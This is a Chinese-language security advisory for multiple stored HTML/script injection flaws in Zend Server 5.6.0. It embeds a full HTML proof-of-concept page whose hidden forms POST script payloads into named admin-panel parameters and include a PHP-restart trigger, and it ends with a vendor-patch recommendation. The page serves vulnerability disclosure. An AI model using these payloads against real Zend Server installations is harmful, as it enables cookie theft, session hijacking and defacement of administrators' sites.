安全研究
安全漏洞
Zend Server多个HTML代码注入漏洞
发布日期:2012-03-10
更新日期:2012-03-13
受影响系统:
Zend Zend Server 5.6不受影响系统:
Zend Optimizer+
Zend Zend Server 5.6.0 SP1 0描述:
BUGTRAQ ID: 52397
Zend是一家PHP公司,成立于1999年,针对PHP的应用陆续发布了至关重要的PHP网络应用平台产品和服务。
Zend Server 5.6.0在几个参数的实现上存在多个HTML注入漏洞,成功利用后可允许攻击者在受影响浏览器中执行任意HTML和脚本代码,窃取Cookie验证凭证,控制站点外观。
<*来源:LiquidWorm
链接:http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5078.php
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<title>Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities</title>
<link rel="Shortcut Icon" href="http://zeroscience.mk/favicon.ico" type="image/x-icon">
<body bgcolor="#1C1C1C"><br />
<img style="margin-left:10" src="http://zeroscience.mk/images/zsl-logo1.png" hight="20%" width="20%">
<script type="text/javascript">
var disclaimer = "This document and all the information it contains are provided \"as is\",\n" +
"for educational purposes only, without warranty of any kind, whether\n" +
"express or implied.\n\n" +
"The author reserves the right not to be responsible for the topicality,\n" +
"correctness, completeness or quality of the information provided in\n" +
"this document. Liability claims regarding damage caused by the use of\n" +
"any information provided, including any kind of information which is\n" +
"incomplete or incorrect, will therefore be rejected.";
var answ = confirm(disclaimer);
if (answ == true){}else{window.location.href = "http://www.zend.com";}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
function xss6(){document.forms["xss6"].submit();}
function xss7(){document.forms["xss7"].submit();}
function rst(){document.forms["rst"].submit();}
</script>
<center><h2 style="position:absolute;left:525;top:32;background-color:#BAB8B9;width:200">
HTML Response:</h2></center>
<iframe src="http://www.zeroscience.mk/codes/zend_s03.txt" width="1100" height="700"
name="ZSL_iframe" align="top" frameborder="0" style="position:absolute;left:525;
top:80;background-color:#cecece;"></iframe>
<font color="#414141" size="2" style="position:absolute;top:795px;right:55px">v0.3</font>
<br />
<form action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBPcHRpbWl6ZXIr"
enctype="application/x-www-form-urlencoded" method="POST" id="xss1" target="ZSL_iframe">
<input type="hidden" name="trgtAction" value="Search" />
<input type="hidden" name="searchName" value='ext:Zend Optimizer+' />
<input type="hidden" name='directives[zend_optimizerplus.blacklist_filename]' value='"><script>alert(1);</script>' />
</form>
<form action="http://localhost:10081/ZendServer/Code-Tracing/Generate-Dump"
enctype="application/x-www-form-urlencoded" method="POST" id="xss2" target="ZSL_iframe">
<input type="hidden" name="traceUrl" value='"><script>alert("ZSL");</script>' />
</form>
<form action="http://localhost:10081/ZendServer/Page-Cache/Save-Rule"
enctype="application/x-www-form-urlencoded" method="POST" id="xss3" target="ZSL_iframe">
<input type="hidden" name="compression" value="1" />
<input type="hidden" name="host" value='"><script>alert(1);</script>' />
<input type="hidden" name="lifetime" value="11" />
<input type="hidden" name="matchConditions" value="ALL" />
<input type="hidden" name="name" value='"><script>alert(2);</script>' />
<input type="hidden" name="path" value='"><script>alert(3);</script>' />
<input type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionMatch]' value="1" />
<input type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionType]' value="equals" />
<input type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionValue]' value="1" />
<input type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionVar]' value="_GET" />
<input type="hidden" name="schema" value="http" />
<input type="hidden" name="type" value="exact" />
</form>
<form action="http://localhost:10081/ZendServer/Job-Queue-Scheduling/Save-Rule"
enctype="application/x-www-form-urlencoded" method="POST" id="xss4" target="ZSL_iframe">
<input type="hidden" name="ruleId" value="" />
<input type="hidden" name="ruleName" value='"><script>alert("ZSL");</script>' />
<input type="hidden" name="ruleUrl" value="http://www.zeroscience.mk" />
<input type="hidden" name="scheduleDailyTime" value="" />
<input type="hidden" name="scheduleEvery" value="schedule-every-hours" />
<input type="hidden" name="scheduleEveryHours" value="1" />
<input type="hidden" name="scheduleEveryMinutes" value="" />
<input type="hidden" name="scheduleHourlyMinute" value="" />
<input type="hidden" name="scheduleMonthlyDay" value="" />
<input type="hidden" name="scheduleMonthlyTime" value="" />
<input type="hidden" name="scheduleType" value="schedule-every" />
<input type="hidden" name="scheduleWeeklyTime" value="" />
</form>
<form action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBKYXZhIEJyaWRnZQ%3D%3D"
enctype="application/x-www-form-urlencoded" method="POST" id="xss5" target="ZSL_iframe">
<input type="hidden" name="trgtAction" value="Search" />
<input type="hidden" name="searchName" value='ext:Zend Java Bridge' />
<input type="hidden" name="directives[zend_jbridge.encoding]" value='"><script>alert(1);</script>' />
</form>
<form action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBEZWJ1Z2dlcg%3D%3D"
enctype="application/x-www-form-urlencoded" method="POST" id="xss6" target="ZSL_iframe">
<input type="hidden" name="trgtAction" value="Search" />
<input type="hidden" name="searchName" value='ext:Zend Debugger' />
<input type="hidden" name="directives[zend_debugger.allow_hosts]" value='"><script>alert(1);</script>' />
<input type="hidden" name="directives[zend_debugger.deny_hosts]" value='"><script>alert(2);</script>' />
</form>
<form action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBPcHRpbWl6ZXIr"
enctype="application/x-www-form-urlencoded" method="POST" id="xss7" target="ZSL_iframe">
<input type="hidden" name="trgtAction" value="Search" />
<input type="hidden" name="searchName" value='ext:Zend Code Tracing' />
<input type="hidden" name='directives[zend_codetracing.log_file]' value='"><script>alert(1);</script>' />
</form>
<form action="http://localhost:10081/ZendServer/Configuration/Webserver-Restart"
enctype="application/x-www-form-urlencoded" method="POST" id="rst" target="ZSL_iframe">
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="1. XSS POST Injection --> 'directives[zend_optimizerplus.blacklist_filename]'" onClick="xss1()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="2. XSS POST Injection --> 'traceUrl'" onClick="xss2()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="3. XSS POST Injection --> 'host', 'name', 'path'" onClick="xss3()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="4. XSS POST Injection --> 'ruleName'" onClick="xss4()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="5. XSS POST Injection --> 'directives[zend_jbridge.encoding]'" onClick="xss5()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="6. XSS POST Injection --> 'directives[zend_debugger.allow_hosts]'" onClick="xss6()" />
<br /><br />
<input type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="7. XSS POST Injection --> 'directives[zend_codetracing.log_file]'" onClick="xss7()" />
<br /><br /><br /><br />
<input type="button"
style="color:white;background-color:#c05c5c;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:5;padding-bottom:5;margin-left:10"
value="8. Restart PHP" onClick="rst()" />
<br /><br />
<br /><br />
<font color="gray" size="2" style="margin-left:10">© 2012. <a href="http://www.zeroscience.mk"
target="_blank" style="text-decoration:none"><font color="gray">Zero Science Lab</font></a><br />
<font style="margin-left:10">Macedonian Information Security Research And Development Laboratory</font>
<br /><font style="margin-left:10">
Proof of Concept (PoC) code for advisory ID:
<a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5078.php" target="ZSL_iframe"
style="text-decoration:none"><font color="gray">ZSL-2012-5078</font></a></font>
</body></html>
建议:
厂商补丁:
Zend
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.zend.com/downloads
浏览次数:2235
严重程度:0(网友投票)
绿盟科技给您安全的保障